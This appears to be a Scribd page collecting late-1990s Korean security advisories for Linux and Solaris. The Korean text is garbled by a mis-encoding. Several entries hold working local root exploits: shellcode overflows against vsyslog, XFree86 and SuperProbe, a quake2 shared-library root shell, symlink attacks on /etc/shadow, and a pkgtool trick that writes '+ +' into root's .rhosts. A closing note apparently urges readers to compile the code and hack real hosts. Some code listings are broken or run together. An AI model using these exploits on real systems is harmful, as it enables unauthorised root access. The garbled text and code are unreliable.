Você está na página 1de 30

Á¦ ¸ñ: [º¸¾È] ¸®´ª½º garbage

¸í—É
net/unix/garbage.c
½Ã½ºÅÛ
Ä¿³Î 2.0.x
¹®Á¦Á¡
NR_FILE (or /proc/sys/kernel/file-max)À» 1024 º¸´Ù ´õ Å©°Ô ÇϹǗνá
¹®Á¦°¡ ¹ß»ýÇÒ ¼ö ÀÖ´Ù.
±×¿¡ ´ëÇÑ ¼Ò½º´Â °ø°³ÇÏÁö ¾Ê°Ú´Ù.
¿Ö³Ä.. ¾ÆÁ÷ ÇØ°á ¹æ¹ýÀÌ ¾ø´Â µíÇÏ´Ù.
2.0.33¹öÁ‾À» ±ò¾Æº¸¾Æµµ ¿ª½Ã ¹ö±×°¡ »ý±ä´Ù.
ÇØ°áÃ¥
±Ã¿©ÁöÃ¥À¸—Î °¢À‾ÀúÀÇ ÇÁ—μ¼½º¸¦ 6°³ ¹Ì¸¸À¸—Î ÇÒ´ç ½ÃÅ°´Â °ÍÀÌ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º vsyslog()
¸í—É
vsyslog() overflow
½Ã½ºÅÛ
Linux with libc 5.4.23 and RH 5.3.12-18
¹®Á¦Á¡
ÀÌ ¹®Á¦Á¡Àº libc 5.4.38¿¡¼ °íÃÄÁ³´Ù.
vsyslog()ÇÔ¼ö¸¦ ¹öÆÛ ¿À¹ö ÇÃ—Î¿ì ½ÃÄÑ À̸¦ ÀÌ¿ëÇÑ´Ù.
$ id
uid=100(guest)
$ ln -s /bin/su hahaha
$ export PATH=.:$PATH
$ hahaha
Password:
# id
uid=0(root) gid=0(root)
# tail -1 /var/log/messages
Jan 6 00:37:36 guest hahaha: root on /dev/ttyp2
À̗± ½ÄÀ¸—Î µÈ´Ù. ¿ø—¡ su ¸¦ Çؼ —çÆ®—Î µÇ¾úÀ»¶§´Â
Jan 6 00:37:36 guest su: root on /dev/ttyp2
—Î µÇ¾î¾ß ÇÑ´Ù.
¿©±â¿¡´Â ¾î¶² º¸¾È»ó ÇêÁ¡ÀÌ ¾ø´Ù. ÇÏÁö¸¸ ÀÌ°ÍÀº openlog()À» À§ÇÑ
argv[0]À» »ç¿ëÇϴµ¥ ¾î¶² °¡´É¼ºÀÌ º¸ÀδÙ.
ÀÌ°ÍÀ» ´õ ÀÚ¼¼ÇÏ°Ô º¸À̸é..
½© Äڵ忡 '/' ¸¦ ¾µ¼ö ¾ø´Â °ü°è—Î.. _bin_sh ¶ó°í ½©Äڵ忡 ¸í½ÃµÇ¾î
ÀÖ´Ù. ±×¸®ÇÏ¿© /bin/sh ¸¦ _bin_sh —Î º¹»çÇصξî¶ó.
±×¸®°í ÇöÀçÀÇ PATH ¿¡ '.'¸¦ Ãß°¡ ½ÃÄѶó.
±×¸®°í³ª¼ ÀÌ ÇÁ—αח¥À» µ¹—Á¾ß ÇÑ´Ù.
/*
vsyslog()/openlog() exploit by BiT - 8/8 1997
Greets to: doodle, skaut, melon, kweiheri etc.
*/
#include
#include
unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
unsigned char shell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff_bin_sh";
char *buf,*p;
unsigned long *adr;
int i;
if((p=buf=malloc(2028+28)) == NULL)
exit(-1);
memset(p,0x90,2028);
p+=2028-strlen(shell);
for(i=0;i
int main()
{
char ident[4096];
memset(ident, 'x', sizeof(ident));
ident[sizeof(ident) - 1] = 0;
openlog(ident, 0, LOG_AUTHPRIV);
syslog(LOG_NOTICE, "message");
return 0;
}
À̸¦ °íÄ¡—Á¸é ÀÌ°÷¿¡¼ ÆÐÄ¡Ç϶ó
http://www.false.com/security/linux-stack/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º X¼¹öR5,R6
¸í—É
X¼¹ö X11R6 , X11R5
½Ã½ºÅÛ
X11R6 ÀÌ ±ò¸° ½Ã½ºÅÛ
¹®Á¦Á¡
X11R6À» ½Ã½ºÅÛ¿¡ ÀνºÅç½Ã setuid ³ª setgid °¡ ºÙ´Â´Ù.
XF86_µå¶óÀ̺ê À̗±°ÍµéÀº setuid °¡ root ÀÌ´Ù.
±×—‾³ª —ÎÄÃÀ‾Àú°¡ ¹öÆÛ ¿À¹ö—±À» ÀÌ¿ëÇؼ Æ‾º°ÇÑ ±ÇÇÑÀ» °¡Áö°Ô µÉ¼ö
ÀÖ´Ù.
¿¢½º ¼¹ö°¡ ½ÃÀµÇ´ µ¿¾È¿¡ ResetHosts() ÇÔ¼ö¸¦ È£ÃâÇÑ´Ù.
±×—²¶§ display ¸¦
X :00000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000009
À̗± ½ÄÀ¸—Î ¼³Á¤ÇÒ¶§... ¹öÆÛ ¿À¹ö Ç×ο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â ÀáÀç—ÂÀ»
°¡Áö°í ÀÖ´Ù.
ÇØ°áÃ¥
1) ¿¢½º ¼¹ö¸¦ ÀνºÅç ÇÑÈÄ ¸ðµç setuid ³ª setgid ¸¦ ¾ø¾Ö¶ó.
2) xdmÀ» ¾²°Å³ª ¾ÈÀüÇÑ setuid ¿ÍÆۗΠX¼¹ö¸¦ ½ÃÀÛÇضó.
ÀÌ°ÍÀº ¹ö±×¿¡ µû¸¥ ¿ÍÆÛÀÌ´Ù.
¼³Ä¡ ¹ýÀº ¿µ¾î—Î °£´ÜÇÏ°Ô ½áÀÖÀ¸¹Ç—Î Àß º¸¸é¼ ¼³Ä¡Çضó.
/*
Description: X server wrapper
Instalation steps:
0. Become root (su -)
1. Modify the X_Server program variable according to your
taste (i.e. the X server true path, not the link to it!)
2. Compile this program as
cc Xserver.c -O4 -o Xserver
3. Copy the resulting binary to /usr/X11/bin, or whatever
path you may have
4. chmod 04711 Xserver
5. Suppose your X server is called "XF86_S3"; issue a command
chmod 0711 XF86_S3
6. Remove the old link for X (e.g X -> /usr/X11/bin/XF86_S3)
7. Make a new link
ln -s /usr/X11/bin/Xserver /usr/X11/bin/X
Copyright policy: the GNU Public License.
This program is intended as a temporary patch for an existing
X server; it is provided "as is", the author is not
responsible for any direct/indirect damage(s) caused by its
use.
*/
#include
#include
#include
#include
#include
#include
/*
This is intended for debugging porposes only.
Do NOT define this for a normal usage!!
*/
#define _DEBUG
#define SIZE 1024
/* guaranteed filled with NULLs by UNIX */
char* args[SIZE];
int argsCount = 0;
char* sccsID =
"@(#) X wrapper 1.0 Copyright (C) 1998 by Vadimir COTFAS (ulianov@mecanica
.math.unibuc.ro), Jan 14th 1998";
char *X_Server = "/usr/X11/bin/XF86_S3";
int main(int argc, char* argv[])
{
int i;
uid_t uid, euid;
struct passwd* pass;
openlog("Xserver", LOG_CONS|LOG_NDELAY|LOG_PERROR|LOG_PID,
LOG_AUTHPRIV);
uid = getuid(); euid = geteuid();
if(!((uid==0) || (euid==0))){
fprintf(stderr,"Xserver: this program must be run as (setuid) root\n")
;
exit(1);
}
pass = getpwuid(uid);
for(i=0; i 2)){
syslog(LOG_NOTICE, "potential buff ovrflw at arg #%d user %s",
i, pass->pw_name);
continue;
}
if(strstr(argv[i], "-config")){
syslog(LOG_NOTICE, "security vulnerability at arg #%d user %s \n",
i, pass->pw_name);
i++;
continue;
}
if(argsCount >= SIZE){
syslog(LOG_NOTICE, "too many args (>1024) user %s \n
",
pass->pw_nam
e);
exit(1);
}
args[argsCount++] = argv[i];
}
args[argsCount] = NULL; /* just to be sure */
#ifdef DEBUG
for(i=0; i
#include
int _init() {
char *sh[2];
sh[0] = "/bin/sh";
sh[1] = NULL;
setuid(0);
setgid(0);
seteuid(0);
execve(sh[0], sh, NULL);
}
ÇØ°áÃ¥
chmod u-s quake2 °ÔÀÓÀº È¥ÀÚÇÏ´Â °Å´Ï±ñ setuid ¸¦ ¾ø¾Ö´Â °ÍÀÌ ³´´Ù.
¹Ýµå½Ã ÇØ¾ß ÇÒ »óȲÀ̶ó¸é
http://synergy.caltech.edu/~ggi/ ¿¡ °¡¸é ÇØ°áÃ¥ÀÌ ÀÖ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º imapd (2)
¸í—É
imapd , ipop3d
½Ã½ºÅÛ
½½—¢ 3.3(imapd ¸¸ ÇØ´ç), ½½—¢ 3.4
¹®Á¦Á¡
Ãʱ⠽½—¢¿þ¾î¿¡¼´Â ÀÌ ¹ö±×°¡ Çã¿ëµÇÁö ¾Ê¾Ò´Ù.
¾Ë¼ö ¾ø´Â À‾Àú°¡ µé¾î¿À—ÁÇÒ¶§ imapd ¿Í ipop3d µ¥¸óÀº
ÄÚ¾î ´ýÇÁ¸¦ ÀÏÀ¸Å²´Ù.
±×—±µ¥ ±× ÆÄÀÏ¿¡ ½¦µµ¿ì ÆÄÀÏÀÌ Ã—°¡µÇ¾îÀÖ´Ù.
±× ÀÌÀ‾´Â µÎ°³ÀÇ µ¥¸óµéÀÌ À‾Àú¸¦ —α×ÀνÃÅ°—Á¸é ½¦µµ¿ì ÆÄÀÏÀ»
ÀоîµéÀ̱⠶§¹®ÀÌ´Ù. À̶§ ÄÚ¾î ´ýÇÁ°¡ »ý°Ü¼ / µð—ºÅ丮¿¡
core ÆÄÀÏÀÌ »ý±ä´Ù.
[root@koek] /# telnet host 110
Trying 10.10.13.1...
Connected to host.com
Escape character is '^]'.
@
+OK some host POP3 3.3(20) w/IMAP2 client (Comments t
o
MRC@CAC.Washingto
n.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
/ µð—ºÅ丮¿¡ °£ÈÄ¿¡
[root@zopie] /# strings core | grep -A3 root
root
[crypted pw here]
10244
Sun Feb 1 23:45:15 1998
--
root:[crypted pw here]:10244:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
[looks like /etc/shadow]
--
root:[crypted pw here]:10244:0:::::
john
host.com
PASS

ÇØ°áÃ¥
¿ì¼±Àº ¸—¾ÆµÎ¸ç ÆÐÄ¡ ¹öÁ‾ÀÌ ³ª¿Ã¶§±îÁö ±â´Ù¸°´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º xServer (À§Çè)
* ÀÌ ¹ö±×´Â »ó´çÈ÷ À§ÇèÇÑ ¹ö±×À̹ǗΠÀý´ë—Î ¾Ç¿ëÇÏÁö ¸»±æ
¹Ù¶õ´Ù. ºÎŹÀÌ´Ù.
¸í—É
XServer
½Ã½ºÅÛ
ÀÎÅÚ x86ÀÇ ¿¢½º ¼¹ö
¹®Á¦Á¡
¿¢½º ¼¹öÀÇ ¹®Á¦Á¡Àº °ú°Å¿¡ ºÎÅÍ ¹®Á¦Á¡ÀÌ Á¦±âµÇ¾î¿Ô´Ù.
µð½º Ç×¹À̸¦ xx—Î ä¿ö¼ ¼¼±×¸ÕÆ® ÆúÆ®¸¦ ³ª¿À°Ô ÇÑ °ÍÀº
¹öÆÛ ¿À¹ö Ç×οìÀÇ °¡´É¼ºÀ» º¸¿©ÁÖ¾ú´Ù.
´ÙÀ½°ú °°Àº ¼Ò½º—Î ÀÏ¹Ý »ç¿ëÀÚ°¡ —çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.

/* Try 2 3 4 5 for OFFSET */


#define OFFSET 2
#include
#include
#include
#define LENCODE ( sizeof( Code ) )
char Code[] =
"\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
"\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
"\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
"\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";
char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
char *args[] = { "X", "-nolock", Display, NULL };
main() {
printf("pHEAR - XFree86 exploit\nby mAChnHEaD \n\nYou
may
get a root prompt now. If you don't, try different values for OFFSET.\n\n");
dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
__asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
memcpy( ptr + 4, ptr, 0x3fc );
memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
execve( "/usr/X11R6/bin/X", args, args + 3 );
perror( "execve" );
}

ÇØ°áÃ¥
¿ì¼±Àº ¼ÂÀ‾Àú ¾ÆÀ̵𸦠¾ø¾Ö¶ó..
¶ÇÇÑ /usr/X11R6 µð—ºÅ丮ÀÇ Æ۹̼ÇÀ» 750 À¸—Î Çصΰí
±×—ìÀ» Á¤Çؼ ÇÊ¿äÇÑ »ç¶÷¸¸ ¾²°Ô Çضó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º cron
¸í—É
vixie cron
½Ã½ºÅÛ
vixie cron(¹öÁ‾ 3.0.1-20ÀÌÇÏ)ÀÌ ¼³Ä¡µÈ ¸®´ª½º,BSD
¹®Á¦Á¡
/usr/bin/crontab Àº ¼ÂÀ‾Àú ¾ÆÀ̵𰡠—çÆ®—Î ºÙ¾îÀÖ´Ù.
±×—±µ¥ ¸Å½Ã°£ À‾Àú¿¡ ÀÇÇØ ºÒ—ÁÁö°Ô µÇ¸é —çÆ® ¼ÒÀ‾ÀÇ Àӽà ÅÆÇÁ ÆÄÀÏÀÌ
»ý±ä´Ù.
ÀÌ ÆÄÀÏÀº /var/spool/cron µð—ºÅ丮 ÀÌ´Ù.
±×—±µ¥ À̶§ ¸¸µé¾îÁö´Â Àӽà ÆÄÀϵéÀº Àڽſ¡°Ô ÇÒ´çµÈ ÄõÅÍ¿¡ ¿µÇâÀ»
¹ÞÁö ¾Ê´Â °æÇâÀÌ ÀÖ´Ù.
ÀÌ¿¡ ÄõÅÍ¿¡ »ó°ü¾øÀÌ µð½ºÅ© full À» ¸¸µé ¼ö ÀÖ´Ù.
¾î¶² ÀϗÃÀÇ °úÁ¤À» ÇÏ°Ô µÇ¸é À̗¸°Ô µÈ´Ù.
[root@genome /]# ls -l /var/spool/cron
total 25106
-rw------- 1 root root 769 Nov 27 20:21 root
-rw------- 1 root lcamtuf 5120000 Feb 5 15:01 tmp.453
-rw------- 1 root lcamtuf 5120000 Feb 5 15:02 tmp.468
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.469
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.482
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.483
À̗¸°Ô µÇ¾î ³ªÁß¿£ ÆÄÀÏÀÌ ²ËÂ÷°Ô µÈ´Ù.
ÇØ°áÃ¥
¾ÆÁ÷ ³ª¿ÍÀÖ´Â ¶Ñ—ÇÇÑ ÇØ°áÃ¥Àº ¾ø´Ù..
´ÜÁö suid ¸¦ ¾ø¾Ö´Â ¼ö ¹Û¿¡..
chmod 700 /usr/bin/crontab ¸¦ Àӽ×ΠÇØÁÖ¸é µÈ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] SUNOS tmpfs
¸í—É
tmpfs
½Ã½ºÅÛ
SunOS 4.1.4
¹®Á¦Á¡
¾ß¸¶¸ð¸® ŸÄɳ븮¾¾°¡ ¹ß°ßÇÑ °ÍÀÌ´Ù. tmpfs ¿¡ ¹®Á¦°¡ ÀÖ´Ù.
ÀÌ ¹ö±×—Î ÀÎÇØ Ä¿³Î ÆдÐÀ» ÀÏÀ¸Å°¸é¼ ½Ã½ºÅÛÀÌ Á״´Ù.
½ºÅ©¸°À̳ª ±âŸ ¸ÖƼ—Î µÎ°³—Î Á¢¼ÓÀ» ÇÑ´Ù.
¾Æ´Ï¸é ½ºÅ©¸°À̶ó´Â ±â´ÉÀ» ÀÌ¿ëÇؼ ȍ¸éÀ» µÎ°³—Î ³ª´©´øÁö..
$ /tmp
$ mkdir a
$ cd a
$ vi b (bÆÄÀÏÀ» ¿°í¼ ¾Æ¹«±ÛÀ̳ª ¾´´Ù. ±×»óÅ¿¡¼...)
[ switch screen ] <=(½ºÅ©¸°ÀÇ °æ¿ì ´Ù¸¥ ½ºÅ©¸°À¸—Î ¹Ù²Ù¾î¶ó.& ¸ÖƼ)
$ rm -r /tmp/a
[ switch screen ] <=(´Ù½Ã ¿ø—¡»óÅ—Π°£´ÙÀ½..ÀúÀåÇغÁ¶ó....)
(save the file using :w in vi)
Ä¿³Î ÆдÐÀ» ÀÏÀ¸Å°¸é¼ ½Ã½ºÅÛÀÌ Á״´Ù.
ÇØ°áÃ¥
ÆÐÄ¡ ¹øÈ£ 103314-01 À» ¼±»çÀÌÆ®¿¡¼ ã¾Æ¼ ÆÐÄ¡Ç϶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º volrmmount
¸í—É
volrmmount
½Ã½ºÅÛ
SunOS 5.6 (sparc and x86)
¹®Á¦Á¡
volrmmountÇÁ—αח¥Àº setuid °¡ °É¸° ÇÁ—αח¥À¸—Î½á ¸ðµçÀ‾Àúµé¿¡°Ô
¸Åü(media)¸¦ ¿°Å³ª ³ÖÀ»¼ö ÀÖ°Ô Çã¶ôÇØÁØ´Ù.
±×—±µ¥ ÀÌ ÇÁ—αח¥À» °ø°ÝÇÒ ¼ö°¡ ÀÖ´Ù. ±×°Í¿¡ ÀÇÇØ ÀÏ¹Ý »ç¿ëÀÚµéÀÌ
±× ½Ã½ºÅÛÀÇ ¾î¶² ÆÄÀÏÀ̵çÁö º¼¼ö ÀÖ°í, —çÆ®ÀÇ ±ÇÇÑÀ» ȹµæÇÒ¼öµµ ÀÖ´Ù.
ÇØ°áÃ¥
´ÙÀ½ÀÇ ÆÐÄ¡ ¹öÁ‾À» °¡Á®¿À¸é µÈ´Ù.
OS version Patch ID
__________ ________
SunOS 5.6 105407-01
SunOS 5.6_x86 105408-01
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º dtappgather (µû²ö~)
¸í—É
/usr/dt/bin/dtappgather
½Ã½ºÅÛ
CDE ¹öÁ‾ 1.0.2 °¡ ±ò¸° ¼Ö¶ó¸®½º 2.5 2.5.1
¹®Á¦Á¡
/usr/dt/bin/dtappgather ÇÁ—αח¥Àº setuid °¡ root —Î °É—ÁÀÖ´Â
ÇÁ—αח¥ÀÌ´Ù.
±×—±µ¥ ¼Ö¶ó¸®½º 2.5 2.5.1 ¿¡¼´Â /usr/dt/bin/dtappgather µð—ºÅ丮°¡
777 ¸ðµå—Î µÇ¾îÀ־ ´©±¸µçÁö ¾²°í ÀÐÀ» ¼ö°¡ ÀÖ´Ù.
( ¼Ö¶ó¸®½º 2.6¿¡¼´Â 755 ¸ðµå—Î µÇ¾îÀÖ´Ù. :-) )
generic-display-0 ¶ó´Â ÆÄÀÏÀ» ¹Ì¸® ¸¸µé¾î ³õ°í setuid °¡ °É¸°
/usr/dt/bin/dtappgather À» ½ÇÇà½ÃÅ°¸é ÆÄÀÏ¿¡ º‾ȍ°¡ ¿Â´Ù.
À̸¦ ÀÌ¿ëÇÏ¸é ½±°Ô ½Ã½ºÅÛÀÇ ¸ðµç ÆÄÀÏÀ» ÀÐ°í ¾²°í ÇÒ ¼ö°¡ ÀְԵȴÙ.
°£´ÜÇϸ鼍µµ ¹«¼¿î ¹ö±×ÀÌ´Ù.

ÇØ°áÃ¥

¾ÆÁ÷ ¹ö±×°¡ ³ª¿ÂÁö Çϗç¹Û¿¡ ¾ÈÁö³µ´Ù.


ÀÌ¿¡.. ¹ö±× ÆÐÄ¡´Â ³ª¿ÀÁö ¾Ê¾Ò´Ù. Á¶¸¸°£ ³ª¿Ã°ÍÀÌ´Ù.
¿ì¼± À̗¸°Ô ¸—¾ÆµÎ¾î¶ó.
chmod -s /usr/dt/bin/dtappgather
---------------------------
Á¦ ¸ñ: [º¸¾È] info2www º¸¾È
¸í—É
info2www
½Ã½ºÅÛ
info2www 1.1(ÀÌÇÏ) À» ±òÀº ½Ã½ºÅÛ
¹®Á¦Á¡
´ÙÀ½°ú °°Àº ÇüÅ—Π¸í—ÉÀ» ³»¸±¼ö ÀÖ´Ù.
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail user_nam
e 4.2 or 5.0 À¸—Î
È‾°æ ¼³Á¤¿¡¼ TMPDIR = /root/tmp °ú °°Àº Çü½ÄÀ¸—Î —çÆ®¸¸
µé¾î°¥ ¼ö ÀÖ´Â µð—ºÅ丮—Î ¼³Á¤À» ÇÑ´Ù.
S.u.S.E ¸®´ª½ºÀÇ °æ¿ì
¹öÁ‾ 5.0 Àº
ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-5.0/a1/aaa_base.rpm
ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-5.0/ap1/makewhat.rpm
¹öÁ‾ 4.4.1 ( ÀÌÇÏ ¹öÁ‾ ) ÀÇ °æ¿ì
ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-4.4.1/a1/aaa_base.tgz
ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-4.4.1/ap1/makewhat.tgz
±âŸ ¸®´ª½º À‾´Ð½ºµîÀº °¢°¢ ftp ¿¡¼ ¾÷±×—¹ÀÌor ÆÐÄ¡ ¹öÁ‾À» ¹Þ¾Æ¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] X11Amp º¸¾È
¸í—É
X11Amp
½Ã½ºÅÛ
X11Amp 0.65 ¸¦ ¾²´Â ½Ã½ºÅÛ
¹®Á¦Á¡
Ç×¹ÀÌ¾î ¸®½ºÆ® ÆÄÀÏÀÌ ~/.X11amp µð—ºÅ丮¿¡ »ý±â´Âµ¥ ±× ÆÄÀÏÀÌ
—çÆ® ±ÇÇÑÀÌ´Ù.
À̸¦ ÀÌ¿ëÇؼ ½¦µµ¿ì¿Í ½Éº¼¸‾ ¸µÅ© ½ÃŲ´Ù.
mkdir ~/.X11amp
ln -s /etc/shadow ~/.X11amp/ek1
±× ÈÄ¿¡ ÀϗÃÀÇ °úÁ¤À» °ÅÄ¡¸é ÇêÁ¡ÀÌ »ý±ä´Ù.
ÇØ°áÃ¥
http://www.x11amp.ml.org ¿¡ °¡¼ ÆÐÄ¡¹öÁ‾À» ¹Þ´Â´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ÄùÀÌÅ© 2
¸í—É
ÄùÀÌÅ© 2 (3.13 ÀÌÇÏ ¹öÁ‾)
½Ã½ºÅÛ
¸®´ª½º
¹®Á¦Á¡
ÄùÀÌÅ©¸¦ ½ÇÇà½ÃÅ°¸é(¾î¶² À‾ÀúµçÁö) config.cfgÆÄÀÏÀ» Àо—Á°í ÇÑ´Ù.
±×—‾³ª À̸¦ ÀÌ¿ëÇؼ config.cfgÆÄÀÏÀ» ½¦µµ¿ì¿Í ¸µÅ© ½ÃÄѼ
ÇêÁ¡ÀÌ »ý±â°Ô ¸¸µé¼ö ÀÖ´Ù.
nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x 1 root root 303444 Feb 24 19:07 /usr/games/qua
ke/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]
ÇØ°áÃ¥
chmod -s /usr/games/quake/quake2
---------------------------
Á¦ ¸ñ: [Âü°í] ¿©±â ÀÇ ¸ðµç ¸®Æ÷Æ®µéÀº —çÆ®¾ò´Â
—çÆ® ¾ò´Â Á¤º¸°¡ µÉ¼ö°¡ ÀÖ°í, ±×°ÍÀ» ¸—À» ¼ö ÀÖ´Â Á¤º¸°¡ ÀÖ½À´Ï´Ù.
º¸Åë ÇØŗÀ» ÇÑ´Ù´Â °ÍÀº ¿©±â¶õÀÇ ±ÛµéÀ» º¸°í ±×¿¡ ¸ÂÃ缍 ÇൿÀ»
Çؼ root ¸¦ ȹµæÇÏ´Â °ÍÀ¸—Î ´ë´Ù¼ö »ç¶÷µéÀÌ »ý°¢ÇÕ´Ï´Ù.
¿©±â¶õÀÇ ±ÛµéÀ» ÀÚ¼¼È÷ º¸°í¼ Çѹø ÇØŗÀ» Çغ¸¼¼¿ä.
Á÷Á¢.. ¸®´ª½º & ¼Ö¶ó¸®½º È£½ºÆ®¿¡¼ ½ÃµµÇغ¸¼¼¿ä.
Á¶±Ý¸¸ ½Å°æ¾²¸é ÇØŗÇÏ´Â °ÍÀº ½ÄÀºÁ× ¸Ô±â º¸´Ù ´õ ½¬¿ö¿ä.
ÇØŗÀº º¸Åë 10ºÐ¾È¿¡ ¼º°ø°ú ½ÇÆи¦ °¡¸§ÇÏ°Ô µÇÁÒ..
10ºÐ¾È¿¡ ¸ðµç ÇØŗÀ» ½Ãµµ ÇÒ ¼ö°¡ ÀÖÁÒ.
¹Ù—Î ÀÌ ¶õÀÇ ¸®Æ÷Æ®µé¿¡ ÀÇÇؼ
¹Ýµå½Ã ÇѹøÀº Àо½Ã°í °¥¹«¸® Çϼ¼¿ä
°¢ ¸®Æ÷Æ® ¸¶´Ù ÇØŗ ¼Ò½º°¡ ÀÖÀ¸´Ï±î¿ä.
±× ÇØŗ ¼Ò½º¸¦ ÄÄÆÄÀÏ Çؼ µ¹¸®¸é º¸Åë —çÆ®¸¦ ȹµæ
ÇÒ ¼ö ÀÖ½À´Ï´Ù.
°¢ °æ¿ìÀÇ ½Ã½ºÅÛ¿¡ ¸ÂÃ缍 ¼Ò½º¸¦ ¾ò¾î¾ß °ÚÁÒ?
¼Ö¶ó¸®½º 2.5.1ÀÇ ¼¹ö¸¦ ÇØŗÇϗÁ¸é ±×¿¡ °ü—ÃµÈ ¼Ò½º¸¸ ½áºÁ¾ß°ÚÁÒ.
¸®´ª½º¶ó¸é ¸®´ª½ºÀÇ ¸Â´Â ¼Ò½º¸¦

Á¦ ¸ñ: [º¸¾È] ¸®´ª½º pkgtool


¸í—É
pkgtool
½Ã½ºÅÛ
Linux Slackware 3.0 or earlier
¹®Á¦Á¡
pkgtoolÀ» ¾µ¶§ /tmp/PKGTOOL.REMOVED¶ó´Â ÆÄÀÏÀÌ »õ±ä´Ù. À̸¦ ÀÌ¿ëÇØ
¸µÅ©½ÃÄѼ .rhosts¸¦ ¸¸µç´Ù.

hamors (2 20:57) litterbox:/tmp> ls -al | grep PKG


- - -rw-rw-rw- 1 root root 16584 Aug 26 18:07
PKGTOOL.REMOVED.backup
hamors (3 21:00) litterbox:/tmp> ln -s ~root/.rhosts PKGTOOL.REMOVED
hamors (4 20:58) litterbox:/tmp> cat PKGTOOL.REMOVED
cat: PKGTOOL.REMOVED: No such file or directory
God (17 20:59) litterbox:~# pkgtool
root now uses PKGTOOL to delete a package
hamors (5 DING!) litterbox:/tmp> head PKGTOOL.REMOVED
Removing package tcl:
Removing files:
...
hamors (6 21:00) litterbox:/tmp> echo "+ +" > PKGTOOL.REMOVED
hamors (7 21:00) litterbox:/tmp> cat ~root/.rhosts
+ +
ÇØ°áÃ¥
pkgtoolÀº —çÆ®¸¸ÀÌ ¾µ¼ö ÀÖµµ—Ï 700 ¸ðµå—Î Çسõ´Â´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º SuperProbe
¸í—É
/usr/X11/bin/SuperProbe
½Ã½ºÅÛ
Linux Slackware 3.1
¹®Á¦Á¡
¹öÆÛ ¿À¹öÇ×ο츦 ÀÏÀ¸Å³ ¼ö ÀÖ´Ù.
--- probe.c ---
#include
#include
#include
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 8192
#define alignment 0
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize / 2; i += 4)
*(char **)&buffer[i] = get_sp() - 2048;
memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
strcpy(&buffer[bufsize - 256], shellcode);
setenv("SHELLCODE", buffer, 1);
memset(buffer, 'x', 72);
*(char **)&buffer[72] = get_sp() - 6144 - alignment;
buffer[76] = 0;
execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer,
NULL);
}
